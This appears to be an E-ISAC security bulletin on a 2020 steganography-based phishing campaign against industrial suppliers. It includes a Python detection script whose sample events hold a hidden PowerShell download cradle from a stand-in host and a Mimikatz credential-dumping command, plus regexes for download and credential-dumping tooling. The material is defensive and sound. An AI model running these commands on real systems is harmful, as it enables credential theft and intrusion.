In May of 2020, cyber security firm Kaspersky reported a form of malware allegedly targeting the supply chains of industrial organizations in the energy sector in Italy, the UK and Germany.
Initial delivery is through a phishing email tailored to its target that carries a malicious MS Office document. When the user interacts with the document, a script is triggered that downloads an image with the new malware hidden inside it. Using steganography to hide code in images is a known attack technique because of its effectiveness: code embedded in image data is difficult for antivirus and other IDS devices to detect. The image file then yields a PowerShell script that eventually leverages Mimikatz to steal Windows credentials.
Potential impacts from targeted malware of this nature include disclosure of legitimate network credentials to an adversary. Adversaries use these credentials to “live off the land” in a target’s environment, in part because misuse of legitimate network credentials is difficult to detect.
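As an added detection example (not from the E-ISAC bulletin or from Kaspersky's report), the following Python scores Windows process-creation events against the delivery chain described above: an Office document spawning a script host, PowerShell fetching an image file from the web, and credential-dumping tooling on the command line. Field names follow Sysmon Event ID 1 conventions; every event value, hostname and path below is constructed for the example.

```python
"""Heuristic triage of process-creation events for the Office -> script ->
image download -> PowerShell -> Mimikatz chain. Events are plain dicts with
Sysmon-style keys (ParentImage, Image, CommandLine); all values are constructed."""
import re
from typing import Dict, List, Tuple

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "cmd.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# Download primitives commonly seen in PowerShell stagers.
DOWNLOAD_CMDLETS = re.compile(
    r"\b(downloadfile|downloadstring|invoke-webrequest|iwr|start-bitstransfer|curl|wget)\b",
    re.I)
# A web URL whose path ends in an image extension.
IMAGE_URL = re.compile(r"https?://\S+\.(png|jpe?g|gif|bmp)\b", re.I)
# Indicators of credential dumping via Mimikatz.
CREDENTIAL_DUMP = re.compile(r"\b(mimikatz|sekurlsa|logonpasswords|invoke-mimikatz)\b", re.I)


def image_name(path: str) -> str:
    """Return the lower-cased file name of a Windows image path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(event: Dict[str, str]) -> List[str]:
    """Return the names of all rules the event triggers (empty list if none)."""
    hits: List[str] = []
    parent = image_name(event.get("ParentImage", ""))
    child = image_name(event.get("Image", ""))
    cmd = event.get("CommandLine", "")

    # Rule 1: an Office application launching a script interpreter.
    if parent in OFFICE_APPS and child in SCRIPT_HOSTS:
        hits.append("office_spawns_script_host")
    # Rule 2: PowerShell using a download primitive to fetch an image file.
    if child in POWERSHELL and DOWNLOAD_CMDLETS.search(cmd) and IMAGE_URL.search(cmd):
        hits.append("powershell_downloads_image")
    # Rule 3: credential-dumping tooling named on any command line.
    if CREDENTIAL_DUMP.search(cmd):
        hits.append("credential_dump_tooling")
    return hits


def triage(events: List[Dict[str, str]]) -> List[Tuple[int, List[str]]]:
    """Return (index, rule names) for every event that triggers at least one rule."""
    return [(i, hits) for i, e in enumerate(events) if (hits := evaluate(e))]


# Constructed sample events: one malicious stager, two benign, one Mimikatz invocation.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"""powershell.exe -nop -w hidden -c "(New-Object Net.WebClient).DownloadFile('http://example.invalid/logo.png','C:\Users\Public\logo.png')" """},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "CommandLine": "chrome.exe https://example.invalid/photos/cat.png"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"""powershell.exe -c "IEX (Get-Content .\m.ps1 -Raw); Invoke-Mimikatz -Command 'sekurlsa::logonpasswords'" """},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\splwow64.exe",
     "CommandLine": "splwow64.exe 12288"},
]

if __name__ == "__main__":
    for index, rules in triage(SAMPLE_EVENTS):
        print(f"event {index}: {', '.join(rules)}")
```

The benign browser event shows why rule 2 requires both a download primitive and an image URL from a PowerShell process, and the Word-to-spooler event shows why rule 1 is restricted to script hosts; either rule alone is noisy, but an event matching rule 1 and rule 2 together, followed by rule 3 on the same host, closely mirrors the chain in this bulletin.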
MITRE ATT&CK Mapping:
What to Do:
A robust and ongoing cyber security awareness program that includes training personnel on how to recognize and report phishing and suspicious emails can help stop malicious emails from entering your environments. Additionally, evaluating and understanding the cyber security program at trusted suppliers is important in maintaining a relationship built on mutual trust.
Kovacs, Eduard (2020). Industrial Suppliers in Japan, Europe Targeted in Sophisticated Attacks. SecurityWeek. Retrieved May 28, 2020, from https://www.securityweek.com/industrial-suppliers-japan-europe-targeted-sophisticated-attacks?&web_view=true
Goodin, Dan (2020). An advanced and unconventional hack is targeting industrial firms. Ars Technica. Retrieved May 30, 2020, from https://arstechnica.com/information-technology/2020/05/an-advanced-and-unconventional-hack-is-targeting-industrial-firms/
Kaspersky ICS CERT (2020). Steganography in Targeted Attacks on Industrial Enterprises. Retrieved from https://ics-cert.kaspersky.com/reports/2020/05/28/steganography-in-targeted-attacks-on-industrial-enterprises/
- Canadian CERTs
- CRISP - Cyber Risk Info Sharing Program
- DHS - NICC, NCCIC, US-CERT, etc
- DOE Complex
- E-ISAC AOO Members
- E-ISAC Staff
- FBI, LE Fusion
- FERC - OEIS, etc
- International (other ISACs, CERTs)
- Other (inc. local/state commissions)
- Trade Organizations
- Watch Floor
- E-ISAC Staff, 06/08/2020